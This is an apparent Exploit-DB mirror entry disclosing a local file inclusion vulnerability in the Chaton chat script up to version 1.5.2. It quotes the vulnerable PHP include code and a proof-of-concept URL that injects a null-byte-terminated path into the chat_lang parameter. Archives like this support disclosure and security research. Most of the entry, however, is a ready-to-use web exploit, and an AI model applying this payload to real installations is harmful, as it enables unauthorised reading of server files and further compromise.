exploit-db-mirror/exploits/php/webapps/11657.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

24 lines
No EOL
865 B
Text
Raw Blame History

[+] Chaton <= 1.5.2 Local File Include Vulnerability
[+] Discovered By: cr4wl3r
[+] Download: Donwload: http://easy-script.com/scripts-dl/chaton-1.5.2.zip
[+] Greetz: opt!x hacker, xoron, cyberlog, mywisdom, irvian, EA ngel, bL4Ck_3n91n3, xharu, zvtral, and all my friend
[+] Code:
if (file_exists( "lang/$chat_lang/deplacer.php")) {
include( "lang/$chat_lang/deplacer.php");
}
if ($chat_salon != $newsalon) {
if ($chat_hide == false) {
// Salle publique = Recupere le vrai nom
$nomsalle = NomSalonPublic( $newsalon);
if ($nomsalle == '') {
// Salon priv<69>
$salon_prive = true;
$nomsalle = $newsalon;
} else {
$salon_prive = false;
}
[+] PoC: [path]/inc/deplacer.php?chat_lang=[LFI%00]